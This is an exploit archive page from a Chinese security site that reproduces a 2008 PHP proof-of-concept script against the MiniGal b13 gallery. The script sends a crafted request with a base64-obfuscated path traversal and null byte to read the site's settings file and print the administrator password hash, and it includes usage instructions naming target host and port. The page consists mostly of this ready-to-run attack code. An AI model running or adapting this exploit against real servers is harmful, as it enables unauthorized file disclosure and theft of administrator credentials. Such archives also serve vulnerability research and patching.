首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Minigal b13 (index.php list) Remote File Disclosure Exploit 来源：www.vfcocus.net 作者：Luja 发布时间：2008-11-17   <?php set_time_limit(0); function find_pass($data){          $pass = explode('$adminpass = "',$data);          if($pass[1]!=""){             echo("Vuln exploited enjoy !\n");             sleep(1);                echo("Admin hash == [".substr($pass[1],0,32)."]\n");          }          else{              echo("Exploit failed!!!!");          } }               function __send($pack,$host,$port){         $ret = "";         $desc = fsockopen($host,$port,$errno, $errstr, 30);         if(!$desc){            echo("Socket say:($errno).[$errstr]");            return;            }            echo("Sending payload !!\n");            fwrite($desc,$pack);            while(!feof($desc)){                 $ret.=fgets($desc);              }         fclose($desc);          find_pass($ret);         flush(); }           echo("\n=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+\n".      "+       MiniGal b13 Source Code Disclosure       +\n".      "+               Alfons Luja                      +\n".      "+  --------------------------------------------  +\n".      "+       Usage poc.php path host port             +\n".      "+    ex: poc.php /press/ wwww.doda.net.pl 80     +\n".      "+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=\n");      if($argc<3){ die("Path - host - Port - comprendo ?"); } $path = $argv[1]; $host = $argv[2]; $port = $argv[3]; $packet = "GET ".$path.base64_decode("aW5kZXgucGhwP2xpc3Q9Li4vc2V0dGluZ3MucGhwJTAwIEhUVFAvMS4x")."\r\n"; $packet .= "Host:".$host."\r\n"; $packet .= "Keep-Alive: 300\r\n"; $packet .= "Connection: keep-alive\r\n\r\n"; echo("\nConnecting to $host\n"); __send($packet,$host,$port); ?>           [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Sudo <= 1.6.9p18 (Defaults set ·MS Windows Server Service Code ·VeryPDF PDFView OCX ActiveX Op ·Opera 9.62 file:// Local Heap ·SlimCMS <= 1.0.0 (edit.php) Re ·FREEze Greetings 1.0 Remote Pa ·Discuz! 6.x/7.x Remote Code Ex ·Chilkat Socket activex 2.3.1.1 ·linux/x86 setuid(0) & execve(/ ·PunBB (Private Messaging Syste ·MemHT Portal 4.0.1 SQL Injecti ·MyTopix <= 1.3.0 (notes send)   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved